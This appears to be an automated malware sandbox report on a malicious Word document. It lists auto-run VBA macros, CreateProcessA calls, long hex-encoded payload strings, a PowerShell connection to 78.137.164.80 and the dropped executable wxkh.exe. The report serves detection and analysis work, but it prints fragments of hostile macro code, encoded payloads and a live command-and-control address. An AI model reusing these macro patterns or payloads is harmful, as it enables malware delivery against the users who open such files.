Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile read: C:\Windows\System32\drivers\etc\hosts
.NET source code contains very large array initializationsShow sources
Source: wxkh.exe.4.dr, ?/??.csLarge array initialization: ?: array initializer size 3752
Source: wxkh.exe.4.dr, ?/?.csLarge array initialization: ?: array initializer size 4584
Source: wxkh.exe.4.dr, ?/??.csLarge array initialization: ?: array initializer size 5664
Source: wxkh.exe.4.dr, ?/??.csLarge array initialization: ?: array initializer size 7992
Source: wxkh.exe.4.dr, ?/?.csLarge array initialization: ?: array initializer size 10860
Source: wxkh.exe.4.dr, ?/?.csLarge array initialization: ?: array initializer size 18348
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: BjgOdvod7.docOLE, VBA macro line: Public Sub Document_Open()
Source: BjgOdvod7.docOLE, VBA macro line: Sub Workbook_Open()
Source: BjgOdvod7.docOLE, VBA macro line: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_OpenName: Workbook_Open
Document contains an embedded VBA macro which may execute processesShow sources
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As Any, AG_GNJ As Any, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Any, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As LongPtr
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As QYT_HES, AG_GNJ As QYT_HES, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Long, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As Long
Source: BjgOdvod7.docOLE, VBA macro line: X6 = CreateProcessA(0&, Y_K, AH_MH, CC_B, False, F_AL, 0&, 0&, YZZ_SRB, CQ_C)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As Any, AG_GNJ As Any, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Any, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As LongPtr
Source: BjgOdvod7.docOLE, VBA macro line: Private Declare Function CreateProcessA Lib "Kernel32" (ByVal L_MAK As Long, ByVal DH_VAJ As String, CJQ_G As QYT_HES, AG_GNJ As QYT_HES, ByVal WJU_WU As Long, ByVal U_UE As Long, ByVal IY_IIX As Long, ByVal R_D As Long, JKJ_IVS As UP_GPQ, ZQ_QT As DE_AJ) As Long
Document contains an embedded VBA with hexadecimal encoded stringsShow sources
Source: BjgOdvod7.docStream path 'Macros/VBA/ThisDocument' : found hex strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C87254C764C39124C4C564C106F34307D5A4C8A4C745B6C4C844C4C681037884C4C4C4C4C8B674C4C2B6F4C4C884C4C1B4C464C4C4C5F4C4431624D534C4C4C8743844C6F2F4C4C3D764C4C4C3B4C2359424C154C5C4C4C4C2F4C3B4C283A6E4C314C194C7723494C404C2B4C163F4C4C1D4C4C8B4C4C4C0D4C5F5A8373361661164C4C4C6D4688284C4C1D2
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 54C4C4C1871833E4C4C484C4C2379273B4C434C4C4C4C4233514C73104C4C4C4C4C3B4C754E1F4C4C714C4C0F4C4C4C2C5A424C0D4C26064C4C834C4C4C6F4C563C4A6161314C4C4E743158354C534C4C244C144C78184C874C1139BE79424C4C4C4C4C4C444C8A4C5E4C885A624C4C60584C4E6D4C562D364C4C794C4C4C4C893B13864C2D5D4C124C5C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C6B2E717A414C7374237F884C4C634C4C83144C5A4C192E1D4C283645234C103E4C3B6A4C4C4C705F4C4C4C71622D4C454C261D5C6559314C4C584A4C684C4C4C88334C69891A4C7B4C8A6F4C374C164C4C304C2D4C3E4C464C14896E4C4C4C19424C3C7C464C4C326F4C4C4C194C41478A4C4C4C4C4C4C304C1384594CDE634C4F4C4C772F4C594C4C1F844
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String C4B4C3A578563624C4C474C22484C4C224C4C4A785D4C4C4C68114C4C536E4C4C4C4C2C4C57470D3457694C614C10234C4C4C4C184C4C154C862A5F704C4C4C4C774C4C3A4C644C0F7835484C4C89800E4C494C4C4C4C1D844C323A4C844C4C234C4A4C4C68344C8388824C4C4C5D4C80293D4C4C4C4C763F6F274C4C1D4C4C434C4C444C214C874C0F4C344C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C21118A5F272C4C4C4155364C4C4C4C727677804C4C4C4C4C4C4B2C4C4C174C4C4C304C7B7F4C434C4F1B4C683A4C4C4C3C4C1D158B284C4C3F6253794C852B4C4325264C4C4C4C4C664C4C4C4C72224C5A4C87474C4C27492A794C484C4C4C32224C0F4C414C5C4C4C824C4C4C4C4C13794C4C244C4C394C4C4C614C4C4C4C29744C4C702B784C8B4C284C7
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 64C714C4C4C4C2B4C76441F4C77814C4C2C164C4C4B3E4C5B79544C4C557A702F36824C4C4C4C4C6A4C5C4C4C4C4C4C4C4C4C4C4C64404C2D4C4C4C32864C7F5458806261474C1F444E4C4C224C834C22524C4C825B4C4F565A724C454C6D4427794C383B645D4C4C225E4C174C1B3C1C413E4C4C4C873E4C4C4C552F4C4C4C4C4C394C894C4C79234C4C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C72644C355C3B8A2B803D4C4C4C6F4C4C4C654C411D4C504C3553816F554C4C4C164C4C6E4C7A5F4A4C4C4C564D164C4C20702E4C4C4C211B0D16764C387F4C4C4C644C4C8A4C400D4C3E4C124C254C42672A28864C4C604C704C702D4C354C764C3C4C58854C4C694C784C2E114C4C484C244C4C374C4C104C4C207F4C7682764C364C4C4C867E2A3F7E834
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String C6C474C4C1D374C7F3E3E4C664C1D2456444C804C4C2F4C5319413060194C5A4C4A34674C3B4C7C4C4C4C684C7B4C4C75664C4C4C10154C24174C4C4C135D72724C4C294C34276988404C6E4C884F4C4C454C4C41704F4C5C4C464C4C4C218281364C3E4C4C164C3A2C5D784C1C4C57633A4C297B4C72804F4C194C4C66214C6E1426154C8B404C4C14504C86
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C4D4C4C376F6F4C144C4C4C4C3A4C2E4C4C188B4C73148C4F4C4C6D6C4C4C2E4C4C4C4C4C173B4C7C4C6787634C4C5E4C4C4C4045804C6E45874C4C4C0F4C5F4C4C4C33774C3F4C671C58194C36864C6A4C4C4C4C1B3B6F4C806B4C4C7A4C144C184C4C4C76234C4C705B614C5E404C63514C4C4C4C4C153E4C7B206A4C5C114C827A0E844C674C2C174C4C1
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String A4C2F384C4C35344C4C4C684C4C4C4C874C4C4C5D4C4C4C4C4C70874C4C11254C554C50784C86358A4C881E534C424C1F4C4C4C4C4C53724C4C824C4C58644C4C701B721B4C544C4C4C6D4C4C543B4C473128434A58624C4C884C0D3C4C4C4C4C4C4C4C4C184C0D4C2B8C4C4C1C4C3349784C244C4C704C67254C3D4C4C4C6935124C72853861587C374C7C29
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String 4C4C57168B451C4C4C323F4C1C4C4C114C4C2E4C484C171E4C4C4D5E4C566A4C78834C7A4C34876E4C4B4C7E4C75864C534C7E774C4C4C46554C4C4C4C4C68854C4C70604C4C6A774C88374C4C684C4C4C4C794C4C4C844C4C844C2422154C2C4C373F1A23566F834C156C3D4C731D4C4C121A4C4C8C4C4C4C4C1F4C444C4B4C4C724C6C4C584C634C4C6D4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String C5B4C4832864C884C24884C897E734C701B4C4C4C4B4C304C4C4C4C4C4C4C2C4C4C5C4C724C4C4C34884C134C6E4C4C4C4C124C4C4C874C254C4C1B4C55264C4C4C4C4C424C4C201C3C24664C294C674C593C4C584127794C4C0D4C4C4C6E5480674C204C74324C8B864C2E2E4C4C6F46674C4C4C0E497D4C4C4C4C206766464C864C5F4C4C4C4C164C204C4C584C4C88884C83857E2B59684C4C574C302C55364C5F4C4C834C244C4C4C764C4C8A164C834C4C644C0D44415E734C574C104C764C7E5E4C114C4C4C4C4C4C4C8A4C6474514E4C276E801D4C4C2E4C4C4C614C4C4C4C4C4C4C824C8C4C4C614C744C4C7E84344C644C724C434C814C4C4C474C4C4C4C4C775F
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 12494C7C4C344C4C4C7A4C234C334C594C4C2279334C264C57541A4A4C4C7D6B4C4C4C494C764C4C4C4B4C4C591B4C832D4C4C4C2226634C6B4C4C554C4C666B2F5B4C667D38514C6B4C4C836F4C4C4C3159712C4C4C4C14174C2E124C2E4C3A4C364C4C2A4C4C4C4C4C4688814C4C0D304C4C4C4C4C4C4C5E72482F4C4C2B564C4C4B4C1421394C6B4C774C1B187E12696A4C45584C3E404C585E4C4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C866938301F7F7C294C4C524C4C166C4C643C4C4C6F391E4C551A69494C4C287E4C181A744C4C4C4C4D4C614C774C344C194C2E4C2C63243C264C4C71204C4C4C377B4C4C5F6479434C444E4C4C2B2F4C4C3C4C455E4C4C4C5A613C4C4C6C904C4C4C364C4C4C4C3E4C2270644C81408B4C4C1E144C2A561781162513244C4C4C5263334C14875B4C14764C4C4C5F4C4C284C4C4C4C4C4C2B1A4C7B4C26
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 3F40811F4C5A784C4C434C454C4C864C45174C4C3F454C8B54514C4C4C4C4C4C435F28804C4C4C6681854C5F4C374C4C2B4C424C2A810D4865331234304C744C5A4C8A7F6B88164C874C564C54744C2A4C4C4C4C1E4C4C5E4C284C4C76434C1E1B114C5A534C4C6C8838534C4C4C364C4C4649384C2D8B6C4C261E786C4C45704C7D444C444C274C614C184C384C4C1A494C4C4C4C4C394C5074825B1D4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C4C4C4C857783834C2C4C4C31224C414C82576A2F30704C4C8C174C4C70504C793B4C4C38694C4C4C4B4C4C24421C4C0D104C4C87654C2C4C6C4C4C2188334C664C714C4C574C4C69484C694C4C4C6D4C2E4C4C4C3F4C164F4C46246A807C4C854D4C234C594C4C4C4553794C6F4C4C0F454C4C4C244C267482514C4C4C4C787E4C574C4C3A224C4C3E4C7E6E5E67474C4E4C4C4C323A3F4C405E4C144C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C3F4C4C896A700F6E4C25396E4C824C204C3C114C4C4C5D32844C4C4C4C4C4C4A7E4C854C4C4C4C797EEE4C4C2C6C8B102D5D61114C644C4C33751F30554C5B10814C293F391E4C334C4C6E4C4C4C4C70834C4C2A894C8B24234C844C563516604C7B4C4F594C1B4C3A4C4C4C1D4C3A4C4C4C75416D4C4C4C4C27224C584C444C654C384C612D3715856D4C4C324C1347704C4C4C4C4C4C4C834C3E4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C4D4C5A114C4C4C4C464C4C6C4C4C4C4C4C22214C2A704C4C4C4C4C66204C894C544C2C524C2D4C844C4C4C74286D254C4C843E4C294C7D4C2B4C1C274C634C4C1E4C254C4C6183364C5D6A4C318B4C784C894C674C4C6D874F334C1E4C86403C0E634C555320382F4C728C4C1F364C41874C6E4C4C5F324C4C644C4C69716530293A4C4C4C59314C5E874C4C6A4C742639E42F2466494C3D4C4C824C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 631A69874C8338563B4C4C864C4C594C4C6B4C4C43194C4C104C0E4C42214C4C56860E5C4C4C0D87754C4C4C4C4C4C4C4C4C4C4E3A4C4C5D4C4C7F4C5580614C4C4C7632584C794C6B2A714C4C4C3B1418712442307D4C4C4C4C4C4C3D7F3F4C51884C4C4C795E124C1C4C1C31454C4C4C774C4C692B4C734A4C4C4C134C4C4C7C665D4C3C814C1F1E4C204C854C763A4C4C4C4C5B4C334C4C4C4C4C4C6
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String B4C304C4C3F4C4C4C4C57884C4C4C1A257A42204C4C4C4C4082717C4C4C691F4C614C4C0F404C1A8A5B4C5B4C4C4C4C554C804C4C4C4C7733763A81454C4C507D334C7F3F4C284C2C4C4C334C814C4C2055574E4C4C154C4A4C1A724C16232783834C4C4F4C4C641B74632F4C4C4C4C566D4C524C4C4C2B4C414C4C1A237E7B4C404C4C4C494C4C4C734C4C4C4C684C4C4C334C4C4C4C4C4C4C0D5E4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C304B4C4C2C49794C4C4C8415847A574C4C740F731C4C4C4C554C224C144C574C4C4C4C253E4C4C364C2244834C4C4C2721324C624C4C4C2F714C344C4C4C864C254C4C6E4C4C4C654A804C8B304C0D3E3D4C324C634C6C4C4C244C4C4C574C4C4C0D4C464C817779253212174C4C4C4C7D0E2B6122893E4C0F4C4C4C4C464C4C3C0D434C61454C6F4C3E4C624C244C4C254C387689104C1A441A4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C706C4C567A4C4C4C864C4C4C0D4C4C4C4C2D564C251A6421383E364C534C4C4C2B4C36184C4C4C4C4C524C4C164C214C864C5A4C544C4C6567704C4C735C4C4C4C3B4C16373E8A4C264C572F6F21414C5A8B644C78253E444C424C4C374C3B4C534C7D4C824C4C3A4C781B440D4C4C4C4C64744C4C704C4C4C54264C4C69734C4C4C576A4C4C4C69824C304C4C4C6B4C634C894C4C4C6F4C4C4C4C4C30
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 1C4C504B4C48484C8C4C4C544C4C4C274C4C4C894C4C564C4C4C4C3914334C5E4C884C594C307660FF4C4C4C4C4C4C384C4C4C4C854C608389854C284C4C4A46434C4C4C4C42334C1E4C6E4C635E3E4C234C4C4C434C5A3E4C3E4C2B63564C4C4C6B6C7B4C5E4C6F744C4C33346D441F4C3489814C6C4C7C4C674C0D4C25424C754C224C4C326B79734C174C4C6C18712F3B374C4C4C4C484C4C6F813B4C6E7C4C4C4C4C2D6E64224C4C4C4C314C4C4A4C134C864C4C234C4C4C4C4411624C4C504C1C504C4C216E124C534C5E8B9A4C4C674C524C4C4C4C264C4C4C6F4C4C4C4C4C4C423B84244C494C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C4C4C253D4C661A4C2F7D21596E194C4E4C67393E844313574C4C7E354C4C4C4C1E544C4E4C384C484C1726561060814C77744C864C374C4C4C4C7F43825C4C654C58217A4C514C4C4C3E4C4C2A4C4C4C831B814C2373702B4C27263F4C4C4A4C414C634C4C654C5E3C6B27548A2A1E4C744C4C4C354C5B5E364C6B334C4C5
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 6308C4C48894329206D4C14554C2E4C155F21492C526018614C4C3B204C164C744C674C3C4C503D4C4C544E4C74843C3A4C181E5E4C104C80284C4C4C4C794C444C4C4C6B4C4C186E6F194C4C4B41630E834C4C8C4C4C4C37201B808C4C4C4C704C4C4C754C4C6A4D533F4CF641644C674C4C1B4C4940976A4C4C8B3E734D4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C3F4C4C4C454C654C4C4C324C6762894C844C394C4C4C4C304C4F4C137A4C4C4C3D8C7B4C814C4C4C734C304C4C5E4D4C4C4C4C4C4C8A4C42424B4C234C344C67587C15444C4C254C68614C0D4C654C6C3A4C303039690E7C5E4C804C4C4C4C4C4C4C4C444C164C4C4C84361B428C4C574C4C19106D3A4C7B4C4C85822B0D4C4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C756D404C4C344C4C834C3F4C4C6E294C4C4C28214C4C4C614C804C4C4C458A4C4C4C4C59384C4C22764C4C4C164C444C4C7B4C114C2D4C18594C4C1E4B17451E614C54806F304C4C454C74664C4C744C4C5D1B214F8B4C4C7A2D4C144F645C4C4C4C4E884C524C57674C4C4C727C2D4C464C4C304C4C4C4C134F4C4C4C4C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 7E4C4C074C4C4C4C4C4C4C6F2B6E4C35784C4C4B4F734C4C4C512D4C4C407C4C2F45752C30324C2C4C214C674C534C4C4C3C794C614C694C4C4C4C4C0F4C4C4C864C4C43155568602C4C5F4888354C654C404C4C4C5D4C4C51684C4C354C264C7455133C4C894C1D3D424C174C6C4C4C4C4C4C624C15354C4C4C4C4C4C4C40456
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 0204C4C36474C4C4C4C284C4C4C4C0E4A374C4C4C6C2D6C7F1A4C4C574C4A4C4C62584C4C654C244C425B194C4C4C4C3E4C644C8882644C4C4C4C394C4C792A4C394C4C4C4C724C754C384C1E204C4C454C4C527D2D694C4C4C114C4C244C4C3D3B4C4C5B52426C7F714C564C4C4C233D4C334C4C4C7A194C4C0F4C6D504C654C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C4C4C314C19511F794C614C7E4C4C4C4C654C4C564C4F454C3C4C5F4C4C4C534C184C754C126D762A1C4C7F4C3E4C4C2B4C30365E325E67324C874C2E4C3D4C4C4C6A7C29606D4C4C3F4C4C6A6D4C7C81474C2A524C4F1A4C6E4C4C7B504C274C4C4C471E0E414C584C8B2B4C5326434C724C4C4C286E8C4C8716567060834
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C724C6A80134C4C74305111274C4C4C4C3D4D6E4C2B4C4C4F554F5C274C604C4C614C614C4C164C4C554C2A874C774C4C77534C114C6E4C4CE54C6959654C3947864C754C4C334C854C344C14784C4CE26D1A634C87614C0D397E354C4C4C395A4C414C314C7D2C4C4C4447264C654C4C4C4C4C4C4C6A4C4C4C4C4C6D4C734C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 73624C4C4C4C6B5E4F264C244C807D4C514C55844C424C704C4C784C4C4C4C4C3C4C4C704C4C144C84194C87404C4C4E4C4C6F4C2B4F4C3E73485D5A4C4C4C744C4C564C194C4C4C5F0D3F85803C4C364C4C3C4C4C4C734C4C774C814C66171F654C724C104C514C4F694C4C18854C652C1C4C4C534C5B821D442B4C4C5C4C7A6
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String D4C4C4C4CFD634C4C4C4C154C4C21294C574C871F4C6E4C4C4C6C4C4C574C414C4C4C687C391A8B5F4C4C144C394C4C4C4C4C4C4C4C4C4C4C4C384C2870828B70754C424C697A4C4C4C344C544C4C3A414C724C7C4C224C764C4C4C4C714C124C73464C4C4C853E694C344C1B4C4C4C324C4C1C4C5F4C4C4D4C4C0E2B4C454E4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 364C504C404A443E1C4F1B4C534C277A724C4C4C217B4C7D4C4C4F674C4C4C57587E4C4C4C2F4C4C2E4C4C3F58514C4C697C584C224C4C4C2C534C4C7831604C424C4D504C5040326E4C3F4B7E4C597F214C8C4C4C69404C1C0F5C4C4C4C437B227C4C4C32264933752E4C4C4C4C4C77634C4C01851A68894E4C5C4C4B2B4C4C6
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 8464C4C4C824F4C25476F3887604C335D6B0D6F4C6D4C4C554C4C654C4C4C4C4C5F70264C742D4C4C4B4C3C0E4C3E35624C2B4C314C504C534C4C0F62644C784C0E5B1A4C4C4C4C4C4C4C254C4C334C79114C344C642C39232E4C4C4C534C4C4C584C4C284C4C4B4C71434C4C794C4C4C614C602851234C3B4C4C6A364C8B4C10
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 61694C504C4C28636B492E4C4A4C4C4C4C6A4C4C414F4C4711204C4C4C4C254E4C8C4C2B444C4C4C4C4C4C5F4C52512E4A304C344C4C644C15824C4C754C5F4C4E27714C4B69274C674C264C1E4C6066544C8A4C50264C4C76653C5C32362C4C5D6D1E804C7E4C4C15464C0E824C4C542E73764C694C5B342D81764C394C823E4
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String C66554C4C4C854C4C4C17594C874C4C4C3B4C4C5B704C1F4C6079154C4C4A54732884104C4E4C294C4C504C344C4C4F524C4C7E594C4C4C5C184C4C534C4C6C3F4C5B4C4C383E4C4C4C1A397F554C7B4C1A3727314C734C4C4C714C544C384C4C4C4C4C4C4C5227604C4C6C4C4C4C874C454C8447494688434C714C4C4C4C4C23
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 844C354C4C4C7C4C2862564F726972812B6D5E7688864C4C5A4C4C4C4C4C4C4C4C104C1C4C84764C6D4C2F737B5C19498584764C4C843F114C554C4C524C4C858A66814C124C4C4C4C284C5D4C4C264C4C5E566D4714874C4C2D3B1427612A4C4C214C63434C4C4C4C4C4C524C3B294C4C484C254F5F4C4C774C4C624C0D51402
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 14C124C4C6F8C4C8761334C4C624C4C1F697A264C4C4C4C8B4C4C324C4C3E4C36821F574C834C4C386B4C214C4C50714C38624C644F4C274C4C2C4C3C530E5A313A4C57306A744C4C4C4C4C174C594C5A7B654C824C4C4C39634C4C4C694C4C2A4C277C4C4C4C50854C694C7A4C4C4C834C4C4C5F7B3E1D4F4C4C33204C5F4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ZRM_S, String 4C4C772B4C4A788C4C4C1F5E4C4C860D4A4C4C0D4C4C5A4C4C2972233F4C4C4C264C654C4C4C233C4C4C6A865B5E754C4C4C114C4C3F525B264C8151264C4C4C1C2D2C4C424C761E4C2A4C3D4C4C4C4C5B184C484C4C4C4C6A414C4C224C22294C763A3F4C4C814C4C42214C3A4C4C4C1A4C4C4C204C7E4A0D474C4C4C144C49444C4C4C4C604C4C4C424C85554C4C4C4C15836A4C624C4C4C4C4C4C4C4C624C644C6C4C824C4C4C4C4C4C4C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 3E724C5371214C5B62524C4C4C4D4C454C844C3E4C4C294C4C4C4C4C2B1F774C4C1C4C4C4C4C603B4C6A4C4C124C4C4C4C526A416C34364C63148922344C6A1D5B4C4C444C4C0F4C38434C124C4C4C4C49327B4C4C4C4C2C4C4C4C264C4C4C4C77711B5A4C3B4C4C3E4C4C4C4C5E684A664C4C444C4C4C4C4C4C21164C4C474C4C404C553D7B4C1A4C4C4C274C4C624D644C4C4C135D204C7F254C4C268B40556772504C4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 1F194C4C8C4C1D124C712D7D4C1D36594C6B2C4C4C244C4C4C2C6A504C395B4C4C514C4C284C4C104C4C8689524C2F2C1B4C4C824C4A4C254C884C4C23454C567A4C623D164C294C467066724C5F48314C6476584C144C4C384C475D1D4C894C4C4C6C4C4C4C4C486512114C4C4C4C35844C714C76714C724C121A7B4C4C4C4C4C674C3A4C0F124C4C2A1F4C7F2D4C4A74554C4C3C4C4C345D4C184C39414C504C61487F30
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 704C714C694C774C57813E764C4C384C4C6D73754C674C4C4C4C3C4C540F4C324C4C804C7D4C4C4C6D4C4C4C474C244C4C4C184C4C4C4C4C4C8B4C480E0F7F485171304C4C0D4C4C4C4C674C3B4C1D254C4C334C764C484C4C4C4C6A314C8B4C4C8B174C4C4B1C4C4C5D4C4C4C4C2F114D595E4C8C4C4C3E4C3736434C43774C4C524C4C4A464C67334C4C4C0D234C6C4C294C3F4C634C4C4E604C204C4C27662C1B4C4C1D
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 0F1F4C4C654B274C3E4C7A4C8A4C6B441883706C4C574C804C4C894C4C142A4C275C314C4C4C802E154C2916814C2E204C494C6B254C1B194C4C4C385D4C5C4C4C734C4C4C854C274C4C4E4C634C4D4C4C4C7C4C28570F4C8A25502722544C366336401A30823A2C894C2C5C4C294C31554C4C7C7A4C704C3A4C424C114C4C244C3A6E404C174C5C7186374C846D6F2C4C464C5A4C4C5E4C4C4C546C4C4C34647B4C4C4C22
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C4C4C2D156B6D4C2F4C79224C4C674C6B4C4C4C204C4D724C4C0F68154C4C694C4C4C764C4C4C544C73874C4C104C4C1D4C154C384C4C884C6A62274C244C6A4E4C4C4C7F4C4C555A4C4C18424C4C1B38613C4C2D4C4C717E4C594C6C294C4C7D79584C724C8B4C63374C83354C2E4C74714C114A884C79844C4C6D4C4C814C194C4E4C1B744C405B4C7B4C7F4C4C4C374C4C4C104C404C724C59181B2B4C754C62767073
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 824C0D4C4C4C4C1A3E4C894C4C431E4C4C4C1E4C5D5389274C313D4C134C2A4C694C4C4C4C1E5C524C4C414C4C4F2A4C4C7E4C4C644C223C624C4C4C13404C4C79684C444C4C564C1D7A1F4C567D14554C116E464C4C4C4C1D2B4C4C4C4C0D4C4C4C4C744C7E5B7F4C4C4C297D4C4C4C481D7E3C894C4C4C4C4C4C184C4C1F37714C524C6A304C4C4C4C7621804C444C81774C4B404C4C784C4C4C42231753454C50674C5A
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 854C10250F4C4C884C5F4C25334E4C3D4C6A824C4C4C133A4C4C6B4C484C4C384C29654C3D4C4C4C4C144C4C2A4C4C67144E4C4C3F4C4C4C4C4C404C4C486A6763164C470D4C854C4D4C2E7D40834C8041801B534C7C4C3768634C4C7D4C454C4C4C4C2D148279554C2070234C1A794C69184C5C204C211C4C814C4C4C4C454C4C4C5F394C4C4C4C697D214C564615204C4C4C0D594C1D6F0D4C602F4F4C4C1B6B8C4C164C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C22364A4C4C4C384C4C214C5B144C4C4C4E4C4C164C88264C434C4C2C174C1049834C1B3423834C0D74733B284C144C4C0E4C214C784C30194C4E4D4C6C424C1F4C4C4C386035154F224C894C4C494C2A4F4C424C17354C285F414C2F4C4C4C6F89834C594E4C4C4C4C354C454C284C110E4C7C794C854C4C4C4C4C2B4C4C6D4C263739724C4C154C4C4C4C434C4C2D4C524C4C104C334C4CEF1B4C4C4553834C7F4C7F4C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C704C874C2C4C254C4C134C28724833484B4C4D4C724C576D647822522F4C2689354C59144C4C2E26154C4C294C484C446D4C4C4C4C7D3D4F4C0F697324254C4C495B4C4C44444C4C5987694C474C4C884C314C4C388966164C364C624C4C2E8B4C4C3954365F4C2F4C4C4C4C4C354C884C4C29131E4C514C4C1A484C4C4C4C874C4C4C5C4C724C81874C4C6F4C37654C44744C12844C264C6F3D514C3323795B394C2447
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C4C302E794C4C594C4C534C4C24702F4C8151604C744E414C225B702643424C1F2A616C504C4C4C4C4C354C4C6E4C1B4C564C4C4C4C73364C4C635041404C5A724C4C4C104C4C4C6C65144B6E57396A4D4C4C8A615B4C374C61394F4C624C4C4C4C4C574C774C4C3A796B4C414C744C0F4C704C4C1E4C1A4C474C4C4C4C4C7A4C4C79764C0D724C344C664D4C4C4C554C50434C4C801C4C814C1A507D4C4C58724C4C194C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String 4C423B4C654C4C4C5D295A444C19604C4C504C4C4C694C13754C3C4C4C4C4C4C457B4C4C7D3F664C13274C614C4C5C654C4E184C4C85894C404C577083144C4C4C4C4C4C854C285E4C8B4C756F864C4C4C544C4C4C4C4C4C4C634C4C4C644C2A6A4C4C4C4C4C4C334C4C464C4C764C2C4C4C4C4C544C4C4B4C4C8050764C724C4C184C864C4C4C4C4C4C4C4C21654C4C58464C4A4C801A47893236594C5E4C4C86696A474C
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Workbook_Open, String
Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 78.137.164.80 80
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\wxkh.exe

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
